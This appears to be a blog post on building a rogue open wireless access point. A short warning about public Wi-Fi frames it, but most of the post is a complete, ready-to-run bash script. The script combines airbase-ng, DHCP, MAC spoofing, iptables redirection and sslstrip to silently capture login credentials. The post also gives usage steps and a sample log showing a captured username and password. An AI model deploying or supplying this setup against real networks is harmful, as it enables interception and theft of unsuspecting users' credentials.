Setting up a malicious wireless access point

It can be tempting to hop onto an open wireless network when you just need to check your email, or you want to send off a tweet. Stop for a moment though, because an open wireless network might not be as safe as you think. With the right tools, an attacker can turn his laptop into an open wireless access point that captures your online activity.

By combining airbase-ng and sslstrip, we can turn our laptop into an access point that silently captures login credentials. This is a similar technique to what I posted before, except instead of connecting to a network and ARP poisoning the target, we lure the target into connecting to our network and sniff their activity.

Here's how it looks:

#!/bin/bash


#____[start of config]_________________________

# these two values can be overwritten using 
# arguments to the command
essid="mylinksys"
channel="11"

subnet="192.168.100.0"
startip="192.168.100.100"
endip="192.168.100.200"
broadcast="192.168.100.255"
router="192.168.100.1"

netmask="255.255.255.0"
dns="8.8.8.8"

#____[end of config]___________________________

# override the default essid if one is provided
if [[ ! -z ${1} ]]; then
    essid="${1}"
fi

# override the default channel if one is provided
if [[ ! -z ${2} ]]; then
    channel="${2}"
fi

function clear_iptables {
    iptables --flush
    iptables --table nat --flush
    iptables --table nat --delete-chain
    iptables --delete-chain
}
function cleanup {
    echo "* cleaning up"
    killall sslstrip
    killall dhcpd3
    rm -rf /tmp/dhcpd
    rm -f /tmp/dhcpd.conf
    ifconfig at0 down
    killall airbase-ng
    clear_iptables
    echo "* end of script"
    exit 0
}

trap cleanup INT

echo "* creating dummy dhcpd.conf"
cat << EOF > /tmp/dhcpd.conf
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet ${subnet} netmask ${netmask} {
    option subnet-mask ${netmask};
    option broadcast-address ${broadcast};
    option routers ${router};
    option domain-name-servers ${dns};
    range ${startip} ${endip};
}
EOF

echo "* starting airbase-ng essid ${essid} on channel ${channel}"
airbase-ng -e "${essid}" -q -c ${channel} mon0 &
sleep 3

echo "* spoofing MAC address for at0"
ifconfig at0 down
macchanger -a at0

echo "* bringing up at0 and setting route"
ifconfig at0 up
ifconfig at0 ${router} netmask ${netmask}
route add -net ${subnet} netmask ${netmask} gw ${router}

echo "* starting dhcpd3"
mkdir -p /tmp/dhcpd
touch /tmp/dhcpd/dhcpd.leases
chown -R dhcpd:dhcpd /tmp/dhcpd
dhcpd3 -q -cf /tmp/dhcpd.conf -pf /tmp/dhcpd/dhcpd.pid -lf /tmp/dhcpd/dhcpd.leases at0

echo "* setting up forwarding rules"
clear_iptables
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT

mygw=$(grep nameserver /etc/resolv.conf | head -1 | cut -d" " -f2)
echo "* using ${mygw} as gateway"
iptables --table nat --append PREROUTING --protocol udp --dport 53 -j DNAT --to ${mygw}

iptables -t nat -D PREROUTING 1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

echo 1 > /proc/sys/net/ipv4/ip_forward

echo "* starting sslstrip and logging results to log.txt"
sslstrip -f -k -w log.txt &

echo "* setup complete, no we wait for connections"
echo "* enter CTRL-C to quit and cleanup"
while :; do
    sleep 60
done;

Put your wireless card in monitor mode with airmon-ng and run the script. The script will create a logfile called log.txt which will contain all POST traffic. If you'd prefer to capture SSL and HTTP traffic, pass the -a option to sslstrip. By default the script creates an access point with an SSID of mylinksys.

While the script is running, just tail the log file and you'll start to see entries such as this:

2011-07-15 18:20:27,752 SECURE POST Data (mlogin.yahoo.com):
_authurl=auth&_done=widget%3Aygo-mail%2Fhome.bp&_sig=&_src=
&_ts=1201692142&_crumb=fI0xXyxcgHakBrA2LoL9nA--&_pc=&_send_userhash=0&_appdata=&_partner_ts=&_is_ysid=1&_page=
secure&_next=nonssl&id=victim&password=hackme&__submit=Sign+In

Look at the last line and you'll see that we've captured the login ID for user victim with password hackme.

So the next time you see an open wireless access point, think twice before logging into it. This is but a simple passive attack that just involves gathering data. However, an attacker can setup a more aggressive attack which launches a set of exploits against each device that connects to the wireless access point in an attempt to gain access to the device itself.